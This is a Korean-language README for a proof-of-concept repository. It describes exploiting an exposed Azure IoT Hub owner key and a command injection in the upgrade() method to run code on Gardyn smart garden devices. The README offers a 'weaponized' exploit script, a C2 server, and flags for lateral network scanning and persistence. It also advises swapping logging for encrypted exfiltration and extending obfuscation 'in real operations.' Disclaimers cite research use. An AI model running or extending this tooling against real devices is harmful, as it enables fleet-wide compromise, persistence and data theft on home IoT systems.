
Azure IoT Hub에서 소유자 수준 공유 액세스 키가 노출되면 연결된 IoT 디바이스에 대해 인증되지 않은 원격 코드 실행(RCE)이 가능합니다. Proof-Of-Concept
[!WARNING] 이 저장소는 고심각도 IoT 취약점에 대한 완전한 기능의 개념 증명(PoC)을 포함하고 있습니다.
이 코드는 교육 목적, 승인된 보안 연구, 방어적 테스트를 위해 엄격히 제공됩니다.무단 사용은 불법입니다. 소유자의 명시적인 서면 허가 없이 시스템을 테스트하거나 악용하는 것은 컴퓨터 사기 및 남용 법률(CFAA), EU 사이버 복원력 법(Cyber Resilience Act) 및 해당 관할권의 기타 관련 법률을 위반합니다.
저자는 이 코드로 인한 오용, 손해 또는 법적 결과에 대해 어떠한 책임도 지지 않습니다.
항상 법적 및 윤리적 경계 내에서 운영하십시오.
CVE-2026-13768은 Gardyn 스마트 정원 시스템에서 IoT Hub 소유자 수준 연결 문자열을 노출시켜 Azure IoT Hub에 대한 완전한 관리 제어를 허용합니다. 이 PoC는 소유자 키를 가진 공격자가 upgrade() 클라우드-투-디바이스 메서드의 명령 주입을 통해 연결된 장치에서 **원격 코드 실행(RCE)**을 달성하여 플릿 전체를 손상시킬 수 있는 방법을 보여줍니다.
제품군은 다음을 포함합니다:
이것은 진행 중인 연구 프로젝트입니다 - 공급망 및 IoT 클라우드 구성 오류를 이해하고 방어하기 위해 책임감 있게 사용하십시오.
upgrade() 메서드를 통해 명령 주입 (CVE-2025-29631 명령 주입 활용).
├── poc.py # Main weaponized exploitation script
├── validate.py # Safe, read-only validation tool
├── c2s.py # Lightweight C2 server for demos
├── TEMPLATES.md # Ready-to-Use Command Templates.
├── README.md
저장소 복제:
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2026-13768.git
cd CVE-2026-13768
python3 -m venv venv
가상 환경 활성화(또는 생성):
source venv/bin/activate
python3 -m pip install --upgrade pip
종속성 설치.
python3 -m pip install azure-iot-hub
python validate.py --conn-str "HostName=yourhub.azure-devices.net;SharedAccessKeyName=iothubowner;SharedAccessKey=..."
종료 코드 0 = 접근 가능한 장치가 있는 유효한 소유자 키. 변경 사항 없음.
python poc.py \
--mode exploit \
--conn-str "HostName=..." \
--device-id "target-device-123" \
--command "whoami" \
--lateral-scan \
--persist
전체 옵션은 python poc.py --help를 실행하십시오.
python c2s.py --port 4444
iothubowner로 인증upgrade() 직접 메서드의 명령 주입 악용참고: 측면 이동 및 지속성 코드는 예시용 자리 표시자입니다. 대상 장치의 OS 및 제약 조건(예: BusyBox 제한 환경)에 맞게 조정하십시오.
/tmp/cve_2026_13768.log에 기록합니다. 실제 작업에서는 암호화된 유출로 교체하십시오.obfuscate_cmd() / deobfuscate_cmd() 함수를 확장하십시오.다음에 대한 기여를 환영합니다:
이슈 또는 PR을 열어 주십시오.
큰 힘에는 큰 책임이 따릅니다.
| Argument | Description | Required |
|---|
--mode | validate 또는 exploit | No (default: validate) |
--conn-str | IoT Hub 소유자 연결 문자열 | Yes |
--device-id | 대상 장치 ID | Yes (exploit mode) |
--command | upgrade() 주입을 통해 실행할 명령 | No (default: id) |
--lateral-scan | 장치에서 LAN 정찰 활성화 | No |
--persist | 지속성 시도(예: cron, systemd) | No |
--c2 | C2 서버로 다시 연결 | No |